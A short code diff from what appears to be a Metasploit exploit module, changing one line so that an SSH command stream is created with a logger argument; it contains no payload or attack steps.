@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if ssh
-      conn = Net::SSH::CommandStream.new(ssh)
+      conn = Net::SSH::CommandStream.new(ssh, logger: self)
       ssh = nil
       return conn
     end
